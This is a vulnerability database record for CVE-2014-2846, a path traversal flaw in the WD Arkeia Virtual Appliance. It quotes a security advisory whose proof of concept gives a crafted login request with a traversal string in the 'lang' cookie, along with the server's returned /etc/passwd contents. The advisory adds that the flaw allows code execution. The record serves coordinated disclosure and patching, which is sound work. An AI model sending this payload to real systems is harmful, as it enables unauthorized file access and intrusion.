ID

VAR-201404-0435


CVE

CVE-2014-2846


TITLE

WD Arkeia Virtual Appliance Of firmware opt/arkeia/wui/htdocs/index.php Vulnerable to directory traversal

Trust: 0.8

sources: JVNDB: JVNDB-2014-002293

DESCRIPTION

Directory traversal vulnerability in opt/arkeia/wui/htdocs/index.php in the WD Arkeia virtual appliance (AVA) with firmware before 10.2.9 allows remote attackers to read arbitrary files and execute arbitrary PHP code via a ..././ (dot dot dot slash dot slash) in the lang Cookie parameter, as demonstrated by a request to login/doLogin. Western Digital Arkeia Virtual Appliance is prone to a local file-include vulnerability. An attacker can exploit this issue using directory-traversal strings to view files and execute local script code in the context of the web server process. This may allow the attacker to compromise the application; other attacks are also possible. Western Digital Arkeia Virtual Appliance 10.2.7 and prior versions are vulnerable. It supports data protection, deduplication, and direct backup of disks and tapes. SEC Consult Vulnerability Lab Security Advisory < 20140423-0 > ======================================================================= title: Path Traversal/Remote Code Execution product: WD Arkeia Virtual Appliance (AVA) vulnerable version: All Arkeia Network Backup releases (ASA/APA/AVA) since 7.0.3. fixed version: 10.2.9 CVE number: CVE-2014-2846 impact: critical homepage: http://www.arkeia.com/ found: 2014-03-05 by: M. Lucinskij SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "The WD Arkeia virtual appliance (AVA) for backup provides simple, reliable and affordable data protection for enterprises seeking to optimize the benefits of virtualization. The AVA offers all the features of the hardware appliance, but permits you to use your own choice of hardware." source: http://www.arkeia.com/en/products/arkeia-network-backup/backup-server/virtual-appliance Business recommendation: ------------------------ The identified path traversal vulnerability can be exploited by unauthenticated remote attackers to gain unauthorized access to the WD Arkeia virtual appliance and stored backup data. SEC Consult recommends to restrict access to the web interface of the WD Arkeia virtual appliance using a firewall until a comprehensive security audit based on a security source code review has been performed and all identified security deficiencies have been resolved by the affected vendor. Path traversal enables attackers access to files and directories outside the web root through relative file paths in the user input. An unauthenticated remote attacker can exploit the identified vulnerability in order to retrieve arbitrary files from the affected system and execute system commands. Proof of concept: ----------------- The path traversal vulnerability exists in the /opt/arkeia/wui/htdocs/index.php script. The value of the "lang" cookie is not properly checked before including a file using the PHP include() function. Example of the request that demonstrates the vulnerability by retrieving the contents of the /etc/passwd file: POST /login/doLogin HTTP/1.0 Host: $host Cookie: lang=aaa..././..././..././..././..././..././etc/passwd%00 Content-Length: 25 Content-Type: application/x-www-form-urlencoded password=bbb&username=aaa The response from the affected application: HTTP/1.1 200 OK Date: Wed, 05 Mar 2014 08:29:35 GMT Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.3.3 Set-Cookie: PHPSESSID=2ga2peps9eak48ubnkvhf69n40; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: subaction=deleted; expires=Tue, 05-Mar-2013 08:29:34 GMT; path=/ Cache-Control: no-cache Pragma: no-cache Charset: UTF-8 Content-Length: 1217 Connection: close Content-Type: text/html; charset=UTF-8 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin ldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologin dhcpd:x:177:177:DHCP server:/:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin {"local":{"STATUS":["0"],"MESSAGE":["Error code 4, Bad password or login"],"PARAM2":[""],"PARAM3":[null],"LAST":[1],"sessnum":[null],"transnum":[n ull]}} Furthermore, the identified vulnerability can be also exploited to execute arbitrary PHP code/system commands by including files that contain specially crafted user input. According to the vendor all Arkeia Network Backup releases (ASA/APA/AVA) since 7.0.3 are affected. Vendor contact timeline: ------------------------ 2014-03-13: Contacting vendor through support@arkeia.com 2014-03-14: Vendor confirms the vulnerability. 2014-03-17: Vendor provides a quick fix and a release schedule. 2014-04-21: Vendor releases a fixed version 2014-04-23: SEC Consult releases a coordinated security advisory. Solution: --------- Update to the most recent version (10.2.9) of Arkeia Network Backup. More information can be found at: http://wiki.arkeia.com/index.php/Path_Traversal_Remote_Code_Execution Workaround: ----------- Advisory URL: ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius Headquarter: Mooslackengasse 17, 1190 Vienna, Austria Phone: +43 1 8903043 0 Fax: +43 1 8903043 15 Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult Interested to work with the experts of SEC Consult? Write to career@sec-consult.com EOF M. Lucinskij / @2014

Trust: 2.07

sources: NVD: CVE-2014-2846 // JVNDB: JVNDB-2014-002293 // BID: 67039 // VULHUB: VHN-70785 // PACKETSTORM: 126286

AFFECTED PRODUCTS

vendor:westerndigitalmodel:arkeia virtual appliancescope:lteversion:10.2.7

Trust: 1.0

vendor:western digitalmodel:arkeia virtual appliancescope: - version: -

Trust: 0.8

vendor:western digitalmodel:arkeia virtual appliancescope:ltversion:10.2.9

Trust: 0.8

vendor:wdcmodel:arkeia virtual appliancescope:eqversion:10.2.7

Trust: 0.6

sources: JVNDB: JVNDB-2014-002293 // CNNVD: CNNVD-201404-558 // NVD: CVE-2014-2846

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2014-2846
value: HIGH

Trust: 1.0

NVD: CVE-2014-2846
value: HIGH

Trust: 0.8

CNNVD: CNNVD-201404-558
value: HIGH

Trust: 0.6

VULHUB: VHN-70785
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2014-2846
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

VULHUB: VHN-70785
severity: HIGH
baseScore: 7.5
vectorString: AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: PARTIAL
integrityImpact: PARTIAL
availabilityImpact: PARTIAL
exploitabilityScore: 10.0
impactScore: 6.4
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: VULHUB: VHN-70785 // JVNDB: JVNDB-2014-002293 // CNNVD: CNNVD-201404-558 // NVD: CVE-2014-2846

PROBLEMTYPE DATA

problemtype:CWE-22

Trust: 1.9

sources: VULHUB: VHN-70785 // JVNDB: JVNDB-2014-002293 // NVD: CVE-2014-2846

THREAT TYPE

remote

Trust: 0.7

sources: PACKETSTORM: 126286 // CNNVD: CNNVD-201404-558

TYPE

path traversal

Trust: 0.6

sources: CNNVD: CNNVD-201404-558

CONFIGURATIONS

sources: JVNDB: JVNDB-2014-002293

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-70785

PATCH

title:Backup and Recovery Server - Deployed as a Virtual Applianceurl:http://www.arkeia.com/products/wd-arkeia/backup-server/virtual-appliance

Trust: 0.8

title:arkeia_appliance_firmware_2-10.2.9url:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=49656

Trust: 0.6

sources: JVNDB: JVNDB-2014-002293 // CNNVD: CNNVD-201404-558

EXTERNAL IDS

db:NVDid:CVE-2014-2846

Trust: 2.9

db:JVNDBid:JVNDB-2014-002293

Trust: 0.8

db:CNNVDid:CNNVD-201404-558

Trust: 0.7

db:BIDid:67039

Trust: 0.4

db:PACKETSTORMid:126286

Trust: 0.2

db:SEEBUGid:SSVID-86262

Trust: 0.1

db:EXPLOIT-DBid:33005

Trust: 0.1

db:VULHUBid:VHN-70785

Trust: 0.1

sources: VULHUB: VHN-70785 // BID: 67039 // JVNDB: JVNDB-2014-002293 // PACKETSTORM: 126286 // CNNVD: CNNVD-201404-558 // NVD: CVE-2014-2846

REFERENCES

url:http://seclists.org/fulldisclosure/2014/apr/257

Trust: 2.5

url:http://wiki.arkeia.com/index.php/path_traversal_remote_code_execution

Trust: 1.8

url:http://www.securityfocus.com/archive/1/531910/100/0/threaded

Trust: 1.7

url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-2846

Trust: 0.8

url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-2846

Trust: 0.8

url:http://www.arkeia.com/

Trust: 0.1

url:https://nvd.nist.gov/vuln/detail/cve-2014-2846

Trust: 0.1

url:http://www.arkeia.com/en/products/arkeia-network-backup/backup-server/virtual-appliance

Trust: 0.1

url:https://www.sec-consult.com

Trust: 0.1

url:http://blog.sec-consult.com

Trust: 0.1

url:https://twitter.com/sec_consult

Trust: 0.1

url:https://www.sec-consult.com/en/vulnerability-lab/advisories.htm

Trust: 0.1

sources: VULHUB: VHN-70785 // JVNDB: JVNDB-2014-002293 // PACKETSTORM: 126286 // CNNVD: CNNVD-201404-558 // NVD: CVE-2014-2846

CREDITS

M. Lucinskij

Trust: 0.4

sources: BID: 67039 // PACKETSTORM: 126286

SOURCES

db:VULHUBid:VHN-70785
db:BIDid:67039
db:JVNDBid:JVNDB-2014-002293
db:PACKETSTORMid:126286
db:CNNVDid:CNNVD-201404-558
db:NVDid:CVE-2014-2846

LAST UPDATE DATE

2025-04-13T23:22:39.047000+00:00


SOURCES UPDATE DATE

db:VULHUBid:VHN-70785date:2020-02-24T00:00:00
db:BIDid:67039date:2014-04-23T00:00:00
db:JVNDBid:JVNDB-2014-002293date:2014-05-01T00:00:00
db:CNNVDid:CNNVD-201404-558date:2020-02-25T00:00:00
db:NVDid:CVE-2014-2846date:2025-04-12T10:46:40.837

SOURCES RELEASE DATE

db:VULHUBid:VHN-70785date:2014-04-28T00:00:00
db:BIDid:67039date:2014-04-23T00:00:00
db:JVNDBid:JVNDB-2014-002293date:2014-05-01T00:00:00
db:PACKETSTORMid:126286date:2014-04-23T21:28:05
db:CNNVDid:CNNVD-201404-558date:2014-04-30T00:00:00
db:NVDid:CVE-2014-2846date:2014-04-28T14:09:07.877